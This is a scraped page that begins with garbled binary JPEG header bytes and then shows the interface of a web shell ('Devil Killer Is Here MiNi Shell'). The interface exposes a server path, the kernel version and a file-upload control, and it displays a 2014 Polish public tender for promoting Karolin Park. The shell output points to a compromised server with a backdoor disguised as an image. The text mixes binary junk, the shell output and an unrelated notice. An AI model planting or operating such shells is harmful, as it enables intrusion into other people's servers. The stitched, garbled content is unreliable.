JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140722/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140722/245346-N-2014.html

<p class="kh_header"><b>Otrębusy: Promocja i informacja w ramach projektu Zabytkowy Park Mazowsza Wizytówką Regionu</b><br>
<b>Numer ogłoszenia: 245346 - 2014; data zamieszczenia: 22.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowy Zespół Ludowy Pieśni i Tańca "Mazowsze" im. Tadeusza Sygietyńskiego , ul. Świerkowa 2, 05-805 Otrębusy, woj. mazowieckie, tel. 22 2088888, faks 22 2088800.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mazowsze.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Promocja i informacja w ramach projektu Zabytkowy Park Mazowsza Wizytówką Regionu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Działania promujące Projekt pn. Zabytkowy Park Mazowsza Wizytówką Regionu realizowany w ramach Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2007-2013.
Szczegółowy opis działań w ramach promocji i informacji:
Zakres działań	Działanie promocyjne	Opis	Specyfikacja
1. Działania	Stworzenie strategii komunikacyjnej	W celu realizacji kampanii Wykonawca będzie zobowiązany do opracowania i przeprowadzenia kreatywnej kampanii informacyjno- promocyjnej projektu pt. Zabytkowy Park Mazowsza Wizytówka Regionu w odniesieniu do wskazanych przez Zamawiającego grup docelowych oraz ram czasowych podanych podczas negocjacji. Celem kampanii będzie upowszechnienie rezultatów wypracowanych podczas trwania projektu rekultywacji terenu Parku Karolin.	Czas realizacji kampanii: 01.07.2014-05.12.2014
komunikacyjne i PR			Głównymi adresatami kampanii będą:
 			-      społeczność lokalna
 			-     turyści
 			-      władze lokalne
 			-      media
 	Opracowanie materiałów komunikacyjnych	Wykonawca w czasie trwania kampanii zobowiązuje się do opracowywania materiałów komunikacyjnych w ścisłej współpracy z Zamawiającym oraz zgodnie z ustalonym harmonogramem.	Materiały komunikacyjne, tj.: backgrounder o projekcie, onepager, informacje i komunikaty prasowe, notatki prasowe, wywiady. Wykonawca zadba o atrakcyjną i czytelną formę materiałów.
 	Biuro prasowe	Wykonawca będzie prowadził biuro prasowe obsługujące komunikację o projekcie, we współpracy i pod nadzorem Zamawiającego.	Wykonawca stworzy i na bieżąco będzie aktualizował listę teleadresową i mailową dziennikarzy prasowych, radiowych i telewizyjnych, z redakcji regionalnych i ogólnopolskich.
 		Wykonawca będzie na bieżąco informował media o działaniach realizowanych w ramach projektu.	Wykonawca przygotuje materiały prasowe, mailingi do dziennikarzy, raporty z follow up.
 		Wykonawca zorganizuje spotkania typu konferencja prasowa, briefing we współpracy z Zamawiającym oraz zgodnie z harmonogramem działań.	Wykonawca zobowiązuje się do organizacji co najmniej dwóch konferencji, jednej w czasie trwania kampanii oraz konferencji podsumowującej. Konferencje będą miały charakter informacyjny bez dodatkowej oprawy artystycznej.
2. Organizacja wydarzeń specjalnych	Uroczyste otwarcie obiektu	W ramach kampanii Wykonawca zaproponuje koncepcję organizacji uroczystości otwarcia obiektu. Wydarzenie będzie miało na celu promocję Parku Karolin oraz upowszechnienie rezultatów wypracowanych podczas trwania kampanii.	Wykonawca w ramach uroczystości zapewni oprawę artystyczną, udokumentuje fotograficznie przebieg wydarzenia, zapewni udział gości specjalnych oraz zaprosi przedstawicieli mediów.
	Adaptacja infrastruktury wokół parku	Wykonawca przedstawi kreatywną koncepcję wykorzystania przestrzeni Pałacu znajdującego się na terenie kompleksu pałacowo-parkowego.	Wykonawca przedstawi propozycję koncertu, wystawy lub innego wydarzenia kulturalnego dla społeczności lokalnej. Wydarzenie powinno mieć na celu przybliżenie uczestnikom kultury oraz historii regionu Mazowsza.
	Organizacja sesji zdjęciowej	Wykonawca będzie odpowiedzialny za organizację sesji zdjęciowej, w której wykorzysta potencjał Parku Karolin.	Sesja powinna mieć charakter wydarzenia otwartego i zachęcać do uczestnictwa społeczność lokalną. Zdjęcia wykonane podczas sesji zostaną wykorzystane w materiałach promocyjnych oraz na stronie internetowej projektu.
3. Reklama w mediach tradycyjnych	Działania PR w telewizji i rozgłośniach radiowych	Wykonawca przygotuje i zrealizuje plan działań promocyjno - informacyjnych w telewizji oraz rozgłośniach radiowych.	Wykonawca zapewni udział przedstawicieli projektu wskazanych przez Zamawiającego, w dwóch wybranych programach tematycznych odpowiednio o zasięgu ogólnopolskim i regionalnym. Ponadto Wykonawca zapewni udział przedstawicieli projektu w dwóch wybranych audycjach radiowych, w których zostaną zaprezentowane informacje odnośnie do projektu.
	Działania promocyjne w prasie	Wykonawca zaproponuje w ofercie tytuły prasowe wraz z uzasadnieniem ich doboru oraz sposobem rozmieszczenia artykułów w poszczególnych tytułach.	Wykonawca zamieści trzy materiały (artykuły, wywiady, ogłoszenia) w prasie ogólnopolskiej, dwa materiały w prasie regionalnej, dwa materiały w dodatkach kulturalnych, oraz jeden artykuł w wybranym tygodniku. Materiały powinny promować oraz upowszechniać informacje na temat Parku Karolin.
4. Strona internetowa	Stworzenie i zarządzanie stroną internetową.	W ramach promocji Parku Karolin w sieci Wykonawca zobowiązuje się do stworzenia oraz aktywnego prowadzenia strony internetowej projektu.	Na stronie zamieszczone zostaną najważniejsze informacje dotyczące zespołu pałacowo-parkowego, jak również zdjęcia/filmy z kolejnych etapów realizacji inwestycji dofinansowanej z RPO WM. Strona internetowa powinna być spójna z pozostałymi działaniami prowadzonymi na portalach społecznościowych. Posty zamieszczane na stronie będą miały charakter artykułów, szeroko opatrzonych zdjęciami promowanego miejsca.
5. Identyfikacja wizualna projektu	Stworzenie projektu materiałów wizualnych	W ramach realizacji działania dotowanego przez UE, Wykonawca jest zobligowany do stworzenia materiałów wizualnych, które będą wykorzystywane do komunikacji. Spójna identyfikacja wizualna projektu ma na celu zwiększenie świadomości społeczeństwa na temat udziału środków Unii Europejskiej oraz budżetu województwa mazowieckiego w projektach realizowanych w ramach Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2007-2013.	Materiały komunikacyjne, które przygotuje Wykonawca:
			-       papier firmowy z oznaczeniem programu, w ramach którego realizowany jest projekt.
			-      bannery reklamowe, które zostaną umieszczone na stronach internetowych
			-       projekt broszury, ulotki
			-     draft dokumentów Power Point.
6. Działania w Social Media	Prowadzenie profili na portalach społecznościowych	W ramach działań Wykonawca wypromuje park i jego historię w kontekście kultury regionu, z którą zespół pałacowo-parkowy Karolin jest ściśle powiązany.	Minimalny zakres działań w obrębie mediów społecznościowych obejmie trzy kanały: Facebook, Youtube, Pinterest. Wykonawca zobowiązuje się do regularnego uaktualniania wybranych kanałów (FB- min.
			I       post dziennie, YT - cotygodniowe uaktualnianie playlisty, P - codzienne aktualizowanie galerii), oraz do zorganizowania promowanych i czasowych kampanii na wybranych kanałach skierowanych do różnych grup docelowych (I etap - kampania warszawska,
			II      etap - kampania regionalna,
			III      etap - kampania krajowa.
7. Działania multimedialne	Współpraca z blogerami	W ramach działań Wykonawca zobowiązuje się do nawiązania ścisłej współpracy przy projekcie z autorami blogów o tematyce kulturalnej i historycznej.	W ramach współpracy, w okresie letnim, blogerzy zaproszeni zostaną na teren zespołu parkowo-pałacowego, gdzie zorganizowana zostanie dla nich sesja zdjęciowa. Spotkanie z blogerami uwieńczy event zorganizowany na terenie kompleksu. W ramach współpracy blogerzy umieszczą na swoich blogach informacje o Toeplitzówce i renowacji parku, zachęcając do śledzenia postępów w pracach remontowych. Na blogach powinna pojawić się również informacja o finalnym otwarciu przewidzianym na koniec 2014 r.
	Stworzenie filmu promującego zespół pałacowo-parkowy	Wykonawca zobowiązuje się do stworzenia filmu na użytek kanałów społecznościowych ze szczególnym uwzględnieniem Youtube.	Film powinien zawierać informacje o regionie, historii i kulturze Mazowsza oraz promować projekt, zachęcając mieszkańców do odwiedzin parku.
8. Media internetowe	Baza mediów internetowych	Wykonawca zobowiązuje się do stworzenia bazy mediów internetowych.	Baza mediów internetowych powinna zawierać portale oraz blogi ściśle dotyczące kultury regionu mazowieckiego oraz historii, z którą związany jest zespół pałacowo-parkowy.
			
	Monitoring mediów internetowych	Wykonawca zobowiązuje się do stałego monitorowania mediów internetowych.	Stworzenie zakładki Media o nas i jej codzienna aktualizacja, w której zamieszczane będą artykuły dotyczące zespołu parkowo-pałacowego, publikowane przez inne podmioty internetowe.
	Partnerzy	Wykonawca w ramach współpracy z mediami internetowymi zobowiązany jest do aktywnej współpracy z portalami związanymi tematycznie z kulturą, folklorem oraz historią.	W ramach współpracy z mediami Wykonawca zobowiązuje się do wysyłania informacji prasowych dotyczących ciekawostek związanych z miejscem, bieżących informacji na temat każdego z etapów renowacji obiektu, jak również zdjęć, które będą mogły zostać wykorzystane przez portale.
9. Harmonogram działań promocyjnych	Opracowanie harmonogramu działań	Opracowanie harmonogramu wszystkich zaproponowanych działań realizowanych przez Wykonawcę.	Wykonawca w harmonogramie zawrze wszystkie działania opisane w ofercie, z uwzględnieniem terminu realizacji zamówienia: wrzesień - grudzień 2014..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.34.22.00-5, 39.29.41.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem ważności oferty jest wniesienie przez Wykonawcę wadium o wartości: 9.000,00 zł (słownie: dziewięć tysięcy złotych) nie później niż do dnia 1.08.2014 na konto Zamawiającego nr 89 1020 1026 0000 1102 0234 6971 PKO Bank Polski z dopiskiem na przelewie WADIUM i oznaczyć: Promocja i informacja w ramach projektu Zabytkowy Park Mazowsza Wizytówką Regionu
Wadium wnoszone w pieniądzu
Wadium wniesione przelewem na konto Zamawiającego uznane będzie za wniesione w terminie, jeżeli przed upływem terminu składania ofert zostanie zaksięgowane na koncie Zamawiającego.
Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
- Potwierdzenie wniesienia wadium należy dołączyć do oferty
Wadium wnoszone w formie niepieniężnej
Wadium może być również wnoszone w:
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
gwarancjach bankowych,
gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U. z 2007 r. Nr 42, poz. 275 ze zm.)
Oryginał wadium wnoszonego w formie niepieniężnej musi być dołączony do oferty.
Zwrot wadium
a)	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
b)	Wykonawcy, którego oferta została uznana za najkorzystniejszą, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
c)	Z zastrzeżeniem pkt. e Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. 
d)	Zamawiający żąda ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium na podstawie pkt. 12.4 ppkt. a, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawcy wnoszą wadium w terminie określonym przez zamawiającego.
e)	Jeżeli wadium zostało wniesione w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
f)	Jeżeli Wykonawca w odpowiedzi na wezwanie do uzupełnienia dokumentów, nie złożył dokumentów lub oświadczeń potwierdzających spełnianie warunków udziału w postępowaniu oraz spełnianie przez oferowane roboty budowlane wymagań określonych przez zamawiającego lub nie złożył pełnomocnictw, Zamawiający zatrzymuje wadium wraz z odsetkami, chyba, że Wykonawca udowodni, że wynika to z przyczyn nie leżących po jego stronie.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
odmówił podpisania umowy na warunkach określonych w ofercie,
nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
Brak dowodu wpłaty wadium skutkuje wykluczeniem Wykonawcy z postępowania, a ofertę uznaje się za odrzuconą</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie załączonych oświadczeń i dokumentów, których wykaz został określony w załączniku nr 1 do wniosku , składanych w celu potwierdzenia spełniania warunków udziału w postępowaniu o udzielenie zamówienia, na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. warunek za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), wykonał należycie co najmniej trzy usługi (przeprowadzenia kampanii promocyjnych) o łącznej wartości nie mniejszej niż 300.000,00 zł netto z zakresu prowadzenia podobnych projektów tj. o charakterze promocyjnym lub domem medialnym. Wykonawca udokumentuje współpracę ze środowiskiem mediów tj. współpracę ze stacją telewizyjną lub producentem programu rozrywkowego w formie przynajmniej dwóch listów polecających lub rekomendacji, wystawionych w okresie ostatnich trzech lat przed upływem terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie załączonego oświadczenia stanowiącego załącznik nr 1 do wniosku na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie załączonego oświadczenia stanowiącego załącznik nr 1 do wniosku na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie załączonego oświadczenia stanowiącego załącznik nr 1 do wniosku na zasadzie spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Co najmniej trzy usługi (przeprowadzenia kampanii promocyjnych) o łącznej wartości nie mniejszej niż 300.000,00 zł netto z zakresu prowadzenia podobnych projektów tj. o charakterze promocji działalności kulturalnej;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca udokumentuje współpracę ze środowiskiem mediów tj. współpracę ze stacją telewizyjną lub producentem programu rozrywkowego w formie przynajmniej dwóch listów polecających lub rekomendacji, wystawionych w okresie ostatnich trzech lat przed upływem terminu składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> negocjacje z ogłoszeniem.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 3.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>1. Do udziału w postępowaniu Zamawiający zaprosi Wykonawców, którzy spełniają warunki podmiotowe oraz uzyskają najwyższe pozycje na liście rankingowej, 2. Zamawiający przyzna dodatkowe punkty Wykonawcom spełniającym warunki udziału w postępowaniu w ten sposób,że za każdy list polecający/rekomendację ponad wymagane dwie Wykonawca otrzyma jeden punkt (maksymalna ilość dodatkowych punktów - dwa), 3. W przypadku, gdy na ostatniej pozycji listy rankingowej z jednakową ilością punktów znajdzie się więcej niż jeden Wykonawca do negocjacji Zamawiający zaprosi wszystkich tych Wykonawców</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mazowsze.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PZLPiT Mazowsze im.Tadeusza Sygietyńskiego, ul. Świerkowa 2, 05-825 Otrębusy, budynek Pałac, pok. 216.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.08.2014 godzina 10:00, miejsce: PZLPiT Mazowsze im.Tadeusza Sygietyńskiego, ul. Świerkowa 2, 05-825 Otrębusy, budynek Pałac, pok. 210.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




